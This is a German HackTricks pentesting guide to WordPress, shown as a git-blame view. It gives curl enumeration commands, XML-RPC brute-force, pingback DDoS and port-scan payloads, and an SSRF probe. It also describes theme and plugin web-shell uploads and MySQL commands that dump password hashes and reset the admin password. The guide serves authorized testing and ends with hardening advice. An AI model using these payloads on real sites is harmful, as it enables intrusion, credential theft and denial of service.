hacktricks/network-services-pentesting/pentesting-web/wordpress.md

423 lines
22 KiB
Markdown
Raw Normal View History

2022-04-28 23:27:22 +00:00
# Wordpress
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2023-12-31 01:24:39 +00:00
2024-02-10 15:36:32 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
\
2024-02-10 15:36:32 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), um Workflows einfach zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\
Erhalten Sie noch heute Zugriff:
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-06-06 22:28:05 +00:00
2024-02-10 15:36:32 +00:00
## Grundlegende Informationen
2024-02-10 15:36:32 +00:00
**Hochgeladene** Dateien gehen zu: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**Themen-Dateien finden Sie in /wp-content/themes/,** daher verwenden Sie wahrscheinlich diesen Pfad, wenn Sie einige PHP des Themas ändern, um RCE zu erhalten. Zum Beispiel: Mit **Theme twentytwelve** können Sie auf die Datei **404.php** zugreifen unter: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Eine andere nützliche URL könnte sein:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
2024-02-10 15:36:32 +00:00
In **wp-config.php** finden Sie das Root-Passwort der Datenbank.
2024-02-10 15:36:32 +00:00
Standard-Anmelderouten zum Überprüfen: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
2024-02-10 15:36:32 +00:00
### **Haupt-WordPress-Dateien**
* `index.php`
2024-02-10 15:36:32 +00:00
* `license.txt` enthält nützliche Informationen wie die installierte WordPress-Version.
* `wp-activate.php` wird für den E-Mail-Aktivierungsprozess bei der Einrichtung einer neuen WordPress-Site verwendet.
* Anmeldungsordner (kann umbenannt werden, um ihn zu verstecken):
* `/wp-admin/login.php`
* `/wp-admin/wp-login.php`
* `/login.php`
* `/wp-login.php`
* `xmlrpc.php` ist eine Datei, die eine Funktion von WordPress darstellt, mit der Daten mit HTTP als Transportmechanismus und XML als Kodierungsmechanismus übertragen werden können. Diese Art der Kommunikation wurde durch die WordPress [REST API](https://developer.wordpress.org/rest-api/reference) ersetzt.
* Der `wp-content`-Ordner ist das Hauptverzeichnis, in dem Plugins und Themes gespeichert werden.
* `wp-content/uploads/` ist das Verzeichnis, in dem alle auf die Plattform hochgeladenen Dateien gespeichert werden.
* `wp-includes/` Dies ist das Verzeichnis, in dem Kerndateien wie Zertifikate, Schriftarten, JavaScript-Dateien und Widgets gespeichert sind.
* `wp-sitemap.xml` In Wordpress-Versionen 5.5 und höher generiert Wordpress eine Sitemap-XML-Datei mit allen öffentlichen Beiträgen und öffentlich abfragbaren Beitragstypen und Taxonomien.
2024-02-10 15:36:32 +00:00
**Nach der Ausnutzung**
2024-02-10 15:36:32 +00:00
* Die Datei `wp-config.php` enthält Informationen, die von WordPress zum Verbinden mit der Datenbank benötigt werden, wie den Datenbanknamen, den Datenbankhost, den Benutzernamen und das Passwort, die Authentifizierungsschlüssel und Salze sowie das Datenbanktabellenpräfix. Diese Konfigurationsdatei kann auch verwendet werden, um den DEBUG-Modus zu aktivieren, der bei der Fehlerbehebung nützlich sein kann.
2024-02-10 15:36:32 +00:00
### Benutzerberechtigungen
* **Administrator**
2024-02-10 15:36:32 +00:00
* **Editor**: Veröffentlicht und verwaltet seine eigenen und andere Beiträge
* **Autor**: Veröffentlicht und verwaltet seine eigenen Beiträge
* **Mitwirkender**: Schreibt und verwaltet seine Beiträge, kann sie jedoch nicht veröffentlichen
* **Abonnent**: Durchsucht Beiträge und bearbeitet sein Profil
2022-05-01 16:57:45 +00:00
## **Passive Enumeration**
2024-02-10 15:36:32 +00:00
### **WordPress-Version abrufen**
2024-02-10 15:36:32 +00:00
Überprüfen Sie, ob Sie die Dateien `/license.txt` oder `/readme.html` finden können
2024-02-10 15:36:32 +00:00
Im **Quellcode** der Seite (Beispiel von [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
2022-10-02 23:08:05 +00:00
* grep
```bash
curl https://victim.com/ | grep 'content="WordPress'
```
* `meta name`
![](<../../.gitbook/assets/image (343).png>)
2024-02-10 15:36:32 +00:00
* CSS-Link-Dateien
![](<../../.gitbook/assets/image (344).png>)
2024-02-10 15:36:32 +00:00
* JavaScript-Dateien
![](<../../.gitbook/assets/image (346).png>)
2024-02-10 15:36:32 +00:00
### Plugins erhalten
{% code overflow="wrap" %}
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
{% endcode %}
2024-02-10 15:36:32 +00:00
### Themes erhalten
{% code overflow="wrap" %}
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
{% endcode %}
2024-02-10 15:36:32 +00:00
### Allgemein Versionen extrahieren
{% code overflow="wrap" %}
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
{% endcode %}
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-06-06 22:28:05 +00:00
2024-02-10 15:36:32 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), um Workflows einfach zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Erhalten Sie noch heute Zugriff:
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-06-06 22:28:05 +00:00
2024-02-10 15:36:32 +00:00
## Aktive Aufzählung
2024-02-10 15:36:32 +00:00
### Plugins und Themes
2024-02-10 15:36:32 +00:00
Sie werden wahrscheinlich nicht in der Lage sein, alle möglichen Plugins und Themes zu finden. Um alle von ihnen zu entdecken, müssen Sie eine Liste von Plugins und Themes **aktiv Brute Forcen** (hoffentlich gibt es automatisierte Tools, die diese Listen enthalten).
2024-02-10 15:36:32 +00:00
### Benutzer
2022-04-28 23:27:22 +00:00
**ID Brute**
2024-02-10 15:36:32 +00:00
Sie erhalten gültige Benutzer von einer WordPress-Website, indem Sie Benutzer-IDs Brute Forcen:
```
curl -s -I -X GET http://blog.example.com/?author=1
```
2024-02-10 15:36:32 +00:00
Wenn die Antworten **200** oder **30X** sind, bedeutet das, dass die ID **gültig** ist. Wenn die Antwort **400** ist, ist die ID **ungültig**.
2022-04-28 23:27:22 +00:00
**wp-json**
2024-02-10 15:36:32 +00:00
Sie können auch versuchen, Informationen über die Benutzer abzurufen, indem Sie abfragen:
```
curl http://blog.example.com/wp-json/wp/v2/users
```
2024-02-10 15:36:32 +00:00
Ein weiterer `/wp-json/` Endpunkt, der einige Informationen über Benutzer offenlegen kann, ist:
```
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
2024-02-10 15:36:32 +00:00
Beachten Sie, dass dieser Endpunkt nur Benutzer offenlegt, die einen Beitrag veröffentlicht haben. Es werden nur Informationen über Benutzer bereitgestellt, bei denen diese Funktion aktiviert ist.
2024-02-10 15:36:32 +00:00
Beachten Sie auch, dass **/wp-json/wp/v2/pages** IP-Adressen preisgeben könnte.
2024-02-10 15:36:32 +00:00
#### Benutzernamen-Enumeration beim Login
2022-10-02 23:08:05 +00:00
2024-02-10 15:36:32 +00:00
Beim Anmelden in **`/wp-login.php`** ist die **Nachricht unterschiedlich**, je nachdem, ob der angegebene Benutzername existiert oder nicht.
2022-05-01 16:57:45 +00:00
### XML-RPC
2024-02-10 15:36:32 +00:00
Wenn `xml-rpc.php` aktiv ist, können Sie einen Anmeldeversuch mit Brute-Force durchführen oder es verwenden, um DoS-Angriffe auf andere Ressourcen durchzuführen. (Sie können diesen Prozess beispielsweise mit [diesem](https://github.com/relarizky/wpxploit) automatisieren).
2024-02-10 15:36:32 +00:00
Um zu überprüfen, ob es aktiv ist, versuchen Sie auf _**/xmlrpc.php**_ zuzugreifen und senden Sie diese Anfrage:
2024-02-10 15:36:32 +00:00
**Überprüfen**
```markup
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```
![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
2024-02-10 15:36:32 +00:00
**Anmeldeinformationen Bruteforce**
2024-02-10 15:36:32 +00:00
**`wp.getUserBlogs`**, **`wp.getCategories`** oder **`metaWeblog.getUsersBlogs`** sind einige der Methoden, die zum Brute-Forcing von Anmeldeinformationen verwendet werden können. Wenn Sie eine davon finden können, können Sie etwas Ähnliches senden:
```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
```
2024-02-10 15:36:32 +00:00
Die Meldung _"Falscher Benutzername oder Passwort"_ sollte in einer Antwort mit dem Code 200 erscheinen, wenn die Anmeldeinformationen ungültig sind.
2024-02-10 15:36:32 +00:00
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
2022-10-08 16:35:25 +00:00
![](<../../.gitbook/assets/image (102).png>)
2024-02-10 15:36:32 +00:00
Mit den richtigen Anmeldeinformationen können Sie eine Datei hochladen. In der Antwort wird der Pfad angezeigt ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
2022-10-08 16:35:25 +00:00
```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
2024-02-10 15:36:32 +00:00
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
2022-10-08 16:35:25 +00:00
</methodCall>
```
2024-02-10 15:36:32 +00:00
Auch gibt es einen **schnelleren Weg**, um Anmeldeinformationen mit Hilfe von **`system.multicall`** per Brute-Force zu ermitteln, da mehrere Anmeldeinformationen in der gleichen Anfrage ausprobiert werden können:
2022-10-22 15:26:54 +00:00
<figure><img src="../../.gitbook/assets/image (188).png" alt=""><figcaption></figcaption></figure>
2024-02-10 15:36:32 +00:00
**2FA umgehen**
2022-02-09 20:26:27 +00:00
2024-02-10 15:36:32 +00:00
Diese Methode ist für Programme und nicht für Menschen gedacht und ist veraltet, daher unterstützt sie keine 2FA. Wenn Sie jedoch gültige Anmeldeinformationen haben, aber der Haupteingang durch 2FA geschützt ist, **können Sie möglicherweise xmlrpc.php missbrauchen, um sich mit diesen Anmeldeinformationen unter Umgehung von 2FA anzumelden**. Beachten Sie, dass Sie nicht alle Aktionen ausführen können, die Sie über die Konsole ausführen können, aber Sie können möglicherweise immer noch RCE erreichen, wie es Ippsec in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) erklärt.
2024-02-10 15:36:32 +00:00
**DDoS oder Port-Scanning**
2024-02-10 15:36:32 +00:00
Wenn Sie die Methode _**pingback.ping**_ in der Liste finden, können Sie Wordpress dazu bringen, eine beliebige Anfrage an einen beliebigen Host/Port zu senden.\
Dies kann verwendet werden, um **Tausende** von Wordpress-**Websites** dazu zu bringen, auf einen **Standort** zuzugreifen (so dass an diesem Standort ein **DDoS** verursacht wird) oder Sie können es verwenden, um **Wordpress** dazu zu bringen, ein internes **Netzwerk** zu **scannen** (Sie können jeden Port angeben).
```markup
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
```
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
2024-02-10 15:36:32 +00:00
Wenn Sie einen **faultCode** mit einem Wert **größer** als **0** (17) erhalten, bedeutet dies, dass der Port geöffnet ist.
2024-02-10 15:36:32 +00:00
Werfen Sie einen Blick auf die Verwendung von **`system.multicall`** im vorherigen Abschnitt, um zu erfahren, wie Sie diese Methode missbrauchen können, um DDoS-Angriffe zu verursachen.
2022-12-09 14:47:58 +00:00
**DDoS**
```markup
<methodCall>
2024-02-10 15:36:32 +00:00
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
```
![](<../../.gitbook/assets/image (103).png>)
2022-12-09 14:47:58 +00:00
### wp-cron.php DoS
2024-02-10 15:36:32 +00:00
Diese Datei befindet sich normalerweise im Stammverzeichnis der Wordpress-Website: **`/wp-cron.php`**\
Wenn auf diese Datei **zugegriffen** wird, wird eine "**schwere**" MySQL-**Abfrage** durchgeführt, die von **Angreifern** verwendet werden kann, um eine **DoS** zu **verursachen**.\
Standardmäßig wird die `wp-cron.php` bei jedem Seitenaufruf aufgerufen (immer wenn ein Client eine beliebige Wordpress-Seite anfordert), was auf stark frequentierten Websites Probleme verursachen kann (DoS).
2022-12-09 14:47:58 +00:00
2024-02-10 15:36:32 +00:00
Es wird empfohlen, Wp-Cron zu deaktivieren und einen echten Cronjob im Host zu erstellen, der die erforderlichen Aktionen in regelmäßigen Abständen ausführt (ohne Probleme zu verursachen).
2022-12-09 14:47:58 +00:00
2022-05-01 16:57:45 +00:00
### /wp-json/oembed/1.0/proxy - SSRF
2024-02-10 15:36:32 +00:00
Versuchen Sie, auf _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ zuzugreifen, und die Wordpress-Site kann eine Anfrage an Sie senden.
2024-02-10 15:36:32 +00:00
Dies ist die Antwort, wenn es nicht funktioniert:
2022-09-30 10:43:59 +00:00
![](<../../.gitbook/assets/image (184) (1).png>)
2022-05-01 16:57:45 +00:00
### SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
2024-02-10 15:36:32 +00:00
Dieses Tool überprüft, ob der **methodName: pingback.ping** und der Pfad **/wp-json/oembed/1.0/proxy** vorhanden sind, und versucht, sie auszunutzen.
2024-02-10 15:36:32 +00:00
### Automatische Tools
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
2022-02-09 20:26:27 +00:00
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-06-06 22:28:05 +00:00
2024-02-10 15:36:32 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), um Workflows einfach zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Erhalten Sie noch heute Zugriff:
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-06-06 22:28:05 +00:00
2024-02-10 15:36:32 +00:00
## Zugriff durch Überschreiben eines Bits
2022-06-23 12:12:25 +00:00
2024-02-10 15:36:32 +00:00
Dies ist mehr eine Kuriosität als ein echter Angriff. In der CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) konnten Sie 1 Bit in einer beliebigen WordPress-Datei umkehren. Sie konnten also die Position `5389` der Datei `/var/www/html/wp-includes/user.php` umkehren, um die NOT (`!`) Operation zu deaktivieren.
2022-06-23 12:12:25 +00:00
```php
2024-02-10 15:36:32 +00:00
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
2022-06-23 12:12:25 +00:00
```
2022-05-01 16:57:45 +00:00
## **Panel RCE**
2024-02-10 15:36:32 +00:00
**Ändern einer PHP-Datei des verwendeten Themes (Administrator-Anmeldeinformationen erforderlich)**
2024-02-10 15:36:32 +00:00
Erscheinungsbild → Theme-Editor → 404-Vorlage (rechts)
2024-02-10 15:36:32 +00:00
Ändern Sie den Inhalt für eine PHP-Shell:
2022-12-24 19:34:46 +00:00
![](<../../.gitbook/assets/image (21) (1) (1).png>)
2024-02-10 15:36:32 +00:00
Suchen Sie im Internet nach Möglichkeiten, auf diese aktualisierte Seite zuzugreifen. In diesem Fall müssen Sie hier zugreifen: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
2022-05-01 16:57:45 +00:00
### MSF
2024-02-10 15:36:32 +00:00
Sie können verwenden:
```
use exploit/unix/webapp/wp_admin_shell_upload
```
2022-05-01 16:57:45 +00:00
## Plugin RCE
2024-02-10 15:36:32 +00:00
### PHP-Plugin
2024-02-10 15:36:32 +00:00
Es ist möglicherweise möglich, .php-Dateien als Plugin hochzuladen.\
Erstellen Sie Ihre PHP-Backdoor zum Beispiel mit:
![](<../../.gitbook/assets/image (407).png>)
2024-02-10 15:36:32 +00:00
Fügen Sie dann ein neues Plugin hinzu:
![](<../../.gitbook/assets/image (409).png>)
2024-02-10 15:36:32 +00:00
Laden Sie das Plugin hoch und klicken Sie auf "Jetzt installieren":
![](<../../.gitbook/assets/image (411).png>)
2024-02-10 15:36:32 +00:00
Klicken Sie auf "Weiter":
![](<../../.gitbook/assets/image (412).png>)
2024-02-10 15:36:32 +00:00
Dies wird wahrscheinlich nichts zu tun scheinen, aber wenn Sie zu "Medien" gehen, sehen Sie Ihre hochgeladene Shell:
![](<../../.gitbook/assets/image (413).png>)
2024-02-10 15:36:32 +00:00
Greifen Sie darauf zu und Sie sehen die URL zum Ausführen der Reverse-Shell:
![](<../../.gitbook/assets/image (414).png>)
2024-02-10 15:36:32 +00:00
### Hochladen und Aktivieren eines bösartigen Plugins
2024-02-10 15:36:32 +00:00
Diese Methode beinhaltet die Installation eines bösartigen Plugins, das als verwundbar bekannt ist und ausgenutzt werden kann, um eine Web-Shell zu erhalten. Dieser Vorgang wird über das WordPress-Dashboard wie folgt durchgeführt:
2024-02-10 15:36:32 +00:00
1. **Plugin-Erwerb**: Das Plugin wird von einer Quelle wie Exploit DB bezogen, zum Beispiel [**hier**](https://www.exploit-db.com/exploits/36374).
2024-02-10 15:36:32 +00:00
2. **Plugin-Installation**:
- Navigieren Sie zum WordPress-Dashboard und gehen Sie zu `Dashboard > Plugins > Plugin hochladen`.
- Laden Sie die Zip-Datei des heruntergeladenen Plugins hoch.
2024-02-10 15:36:32 +00:00
3. **Plugin-Aktivierung**: Sobald das Plugin erfolgreich installiert ist, muss es über das Dashboard aktiviert werden.
2024-02-10 15:36:32 +00:00
4. **Ausnutzung**:
- Mit dem installierten und aktivierten Plugin "reflex-gallery" kann es ausgenutzt werden, da es als verwundbar bekannt ist.
- Das Metasploit-Framework bietet einen Exploit für diese Schwachstelle. Durch Laden des entsprechenden Moduls und Ausführen spezifischer Befehle kann eine Meterpreter-Sitzung hergestellt werden, die unbefugten Zugriff auf die Website gewährt.
- Es ist zu beachten, dass dies nur eine von vielen Methoden ist, um eine WordPress-Website auszunutzen.
2024-02-10 15:36:32 +00:00
Der Inhalt enthält visuelle Hilfsmittel, die die Schritte im WordPress-Dashboard zur Installation und Aktivierung des Plugins darstellen. Es ist jedoch wichtig zu beachten, dass das Ausnutzen von Schwachstellen auf diese Weise ohne ordnungsgemäße Autorisierung illegal und unethisch ist. Diese Informationen sollten verantwortungsbewusst und nur in einem legalen Kontext verwendet werden, wie zum Beispiel bei Penetrationstests mit ausdrücklicher Genehmigung.
2024-02-10 15:36:32 +00:00
**Für detailliertere Schritte siehe: [https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**
2024-02-10 15:36:32 +00:00
## Post-Exploitation
2024-02-10 15:36:32 +00:00
Extrahieren von Benutzernamen und Passwörtern:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```
2024-02-10 15:36:32 +00:00
Ändern Sie das Administratorpasswort:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
2024-02-10 15:36:32 +00:00
## WordPress-Schutz
2024-02-10 15:36:32 +00:00
### Regelmäßige Updates
2024-02-10 15:36:32 +00:00
Stellen Sie sicher, dass WordPress, Plugins und Themes auf dem neuesten Stand sind. Bestätigen Sie auch, dass die automatische Aktualisierung in der wp-config.php aktiviert ist:
```bash
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```
2024-02-10 15:36:32 +00:00
Außerdem sollten nur vertrauenswürdige WordPress-Plugins und -Themes installiert werden.
2024-02-10 15:36:32 +00:00
### Sicherheits-Plugins
2022-02-09 18:48:09 +00:00
* [**Wordfence Security**](https://wordpress.org/plugins/wordfence/)
* [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
* [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
2024-02-10 15:36:32 +00:00
### **Weitere Empfehlungen**
2024-02-10 15:36:32 +00:00
* Entfernen Sie den Standardbenutzer **admin**
* Verwenden Sie **starke Passwörter** und **2FA**
* Überprüfen Sie regelmäßig die **Berechtigungen** der Benutzer
* Begrenzen Sie die Anzahl der Anmeldeversuche, um Brute-Force-Angriffe zu verhindern
* Benennen Sie die Datei **`wp-admin.php`** um und erlauben Sie nur den Zugriff intern oder von bestimmten IP-Adressen.
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
\
2024-02-10 15:36:32 +00:00
Verwenden Sie [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), um Workflows einfach zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\
Erhalten Sie noch heute Zugriff:
2022-06-06 22:28:05 +00:00
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2023-12-31 01:24:39 +00:00
2024-02-10 15:36:32 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
</details>